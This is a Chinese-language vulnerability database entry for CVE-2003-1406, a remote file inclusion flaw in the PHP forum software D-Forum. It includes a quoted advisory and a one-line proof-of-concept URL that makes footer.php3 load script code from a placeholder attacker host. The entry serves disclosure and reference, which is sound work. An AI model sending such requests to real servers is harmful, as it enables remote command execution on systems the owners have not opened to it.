D-Forum远程文件包含漏洞

D-Forum远程文件包含漏洞

漏洞ID 1107204 漏洞类型 代码注入
发布时间 2003-02-18 更新时间 2003-12-31
图片[1]-D-Forum远程文件包含漏洞-安全小百科CVE编号 CVE-2003-1406
图片[2]-D-Forum远程文件包含漏洞-安全小百科CNNVD-ID CNNVD-200312-113
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/22257
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-113
|漏洞详情
D-Forum是一款由PHP编写的论坛程序。D-Forum包含的’/includes/header.php3’和’/includes/footer.php3’脚本对用户提交的输入缺少正确检查,远程攻击者可以利用这个漏洞指定包含远程服务器上的任意文件,以WEB权限在系统上执行任意命令。’/includes/header.php3’和’/includes/footer.php3’脚本对’$my_footer’和’$my_header’变量缺少正确的检查,攻击者可以指令此变量包含远程服务器上的文件,如果包含的文件包含恶意脚本代码,可以WEB权限在目标服务器上执行。
|漏洞EXP
source: http://www.securityfocus.com/bid/6879/info
 
D-Forum is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in the /includes/header.php3 and /includes/footer.php3 scripts.
 
Under some circumstances, it is possible for remote attackers to influence the include path for the header and footer files to point to an external file on a remote server by manipulating some URI parameters. 

http://[target]/includes/footer.php3?my_footer=http://[attacker]/script.txt
|参考资料

来源:XF
名称:dform-header-file-include(11342)
链接:http://xforce.iss.net/xforce/xfdb/11342
来源:BID
名称:6879
链接:http://www.securityfocus.com/bid/6879
来源:VULNWATCH
名称:20030216D-Forum(PHP)
链接:http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0072.html
来源:NSFOCUS
名称:4424
链接:http://www.nsfocus.net/vulndb/4424

相关推荐: WodFTPServer FTP Command Buffer Overflow Vulnerability

WodFTPServer FTP Command Buffer Overflow Vulnerability 漏洞ID 1099560 漏洞类型 Boundary Condition Error 发布时间 2003-09-25 更新时间 2003-09-25 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享